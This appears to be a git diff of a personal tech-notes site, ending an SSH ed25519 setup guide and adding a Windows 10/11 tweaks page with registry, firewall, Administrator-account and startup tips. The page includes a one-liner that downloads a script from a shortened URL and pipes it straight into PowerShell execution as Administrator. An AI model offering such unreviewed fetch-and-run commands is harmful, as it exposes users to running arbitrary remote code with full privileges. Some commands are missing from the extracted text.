file on the server. Step 5: Using SSH with ed25519 Keys for Secure Connections Now that you have your ed25519 SSH keys generated or imported, and added to the SSH Agent, you can use SSH to connect to remote servers or services like Git securely.
For example, to connect to a remote server:
ssh username@remote_host
+
Using SSH keys will also allow you to interact with Git repositories securely, which is especially helpful when dealing with private repositories or pushing code changes.
Wrapping Up By following this guide, you have configured the SSH client and SSH agent on your Windows system using ed25519 keys. This configuration ensures secure communication with services like Git and remote servers, safeguarding the integrity and security of your data.
Back to top
\ No newline at end of file
diff --git a/windows/windows-tweaks/index.html b/windows/windows-tweaks/index.html
new file mode 100644
index 000000000..fe1e899ec
--- /dev/null
+++ b/windows/windows-tweaks/index.html
@@ -0,0 +1,177 @@
+ Windwos 10/11 Tweeks - 3os Windwos Tweeks Authors: fire1ce | Created: 2022-06-15 | Last update: 2022-06-15 Windwos 10/11 Tweeks Some tips and tricks and Tweeks for Windows 10/11 that may be helpful or even essential for you
Deblot Windwos 10/11 Powershell Script Source: Windows10Debloater Github Page
Run as Administrator:
iwr -useb https://git.io/debloat|iex
+
To enable the context menu that appeared in Windows 10 and earlier, you can use the following PowerShell snippet.
New-Item -Path "HKCU:\Software\Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32" -Value "" -Force
+
You may need to log out and log back in or restart explorer.exe
.
Get-Process explorer | Stop-Process
+
The context menu will now look like this:
Allow ICMP (Ping) in Windows Firewall The following commands will allow ICMP (Ping) in Windows Firewall. Use Powershell as Administrator to run the following commands.
For IPv4:
netsh advfirewall firewall add rule name = "ICMP Allow incoming V4 echo request" protocol = "icmpv4:8,any" dir = in action = allow
+
For IPv6:
netsh advfirewall firewall add rule name = "ICMP Allow incoming V6 echo request" protocol = "icmpv6:8,any" dir = in action = allow
+
Activate Administrator User Hit the Windows Key + R and type
Edit Administrator, remove the - [x] Account is disable. ok
Right Click on Administrator and click Set Password
Lunch "Network Connections" Hit the Windows Key + R and type
Add Program to Startup - Windows 7,8,10 & Servers Hit WIN+R or from start menu search run
and press enter. At run dialog enter shell:common startup
:
Create shortcut for the program you want to auto startup when Windows boots. Move the shortcut to the Startup
folder that opened before. Reboot or Shutdown Windows From Command Line (CMD) Reboot windows computer This command will set a time out of 10 seconds to close the applications. After 10 seconds, windows reboot will start.
Force reboot
Force Shutdown
Back to top
\ No newline at end of file